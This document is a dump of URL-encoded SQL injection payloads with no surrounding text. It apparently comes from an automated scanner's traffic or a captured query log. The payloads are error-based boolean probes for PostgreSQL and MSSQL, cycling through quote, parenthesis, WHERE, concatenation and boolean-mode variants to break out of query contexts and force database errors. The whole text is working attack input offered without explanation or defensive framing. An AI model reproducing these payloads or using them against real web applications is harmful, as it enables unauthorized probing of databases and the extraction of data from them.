1%27%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27gnCJ%27%20LIKE%20%27gnCJ 1%22%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22pBgC%22%3D%22pBgC 1%22%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22rhdO%22%3D%22rhdO 1%22%29%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22yANJ%22%3D%22yANJ 1%22%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22Djvv%22%3D%22Djvv 1%22%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22XhqG%22%20LIKE%20%22XhqG 1%22%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22FnNI%22%20LIKE%20%22FnNI 1%22%29%29%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22dGcw%22%20LIKE%20%22dGcw 1%22%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22zEdy%22%20LIKE%20%22zEdy 1%29%20WHERE%203549%3D3549%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%27%29%20WHERE%202563%3D2563%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%27%20WHERE%206360%3D6360%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%22%20WHERE%207122%3D7122%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 1%27%20%7C%7C%20%28SELECT%209736%20FROM%20DUAL%20WHERE%206504%3D6504%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204981%20WHERE%209389%3D9389%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208889%20FROM%20DUAL%20WHERE%205796%3D5796%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29 1%20%2B%20%28SELECT%208346%20WHERE%207429%3D7429%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29 1%27%20%2B%20%28SELECT%20%27Wrhl%27%20FROM%20DUAL%20WHERE%205255%3D5255%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27LYiJ%27%20WHERE%204388%3D4388%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208958%3DCAST%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288958%3D8958%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%23 1%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%22%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%286680%3D6680 1%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%283058%3D3058 1%29%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%289147%3D9147 1%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27HXYn%27%3D%27HXYn 1%27%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27Vuyj%27%3D%27Vuyj 1%27%29%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27SNzt%27%3D%27SNzt 1%27%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27StMe%27%3D%27StMe 1%27%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27aKQd%27%20LIKE%20%27aKQd 1%27%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27SLNX%27%20LIKE%20%27SLNX 1%27%29%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27sWAT%27%20LIKE%20%27sWAT 1%27%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27eKPi%27%20LIKE%20%27eKPi 1%22%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22Iiao%22%3D%22Iiao 1%22%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22xahN%22%3D%22xahN 1%22%29%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22ygOl%22%3D%22ygOl 1%22%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22cLTA%22%3D%22cLTA 1%22%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22uoyg%22%20LIKE%20%22uoyg 1%22%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22IvbS%22%20LIKE%20%22IvbS 1%22%29%29%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22HCiC%22%20LIKE%20%22HCiC 1%22%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22eVMr%22%20LIKE%20%22eVMr 1%29%20WHERE%208294%3D8294%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%29%20WHERE%205663%3D5663%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%20WHERE%201912%3D1912%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%22%20WHERE%204811%3D4811%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%20%7C%7C%20%28SELECT%203994%20FROM%20DUAL%20WHERE%204024%3D4024%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207821%20WHERE%207781%3D7781%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%202935%20FROM%20DUAL%20WHERE%205013%3D5013%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29 1%20%2B%20%28SELECT%203371%20WHERE%203133%3D3133%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29 1%27%20%2B%20%28SELECT%20%27iiLM%27%20FROM%20DUAL%20WHERE%201132%3D1132%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27DyMB%27%20WHERE%207895%3D7895%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208551%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288551%3D8551%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%23 1%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%22%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 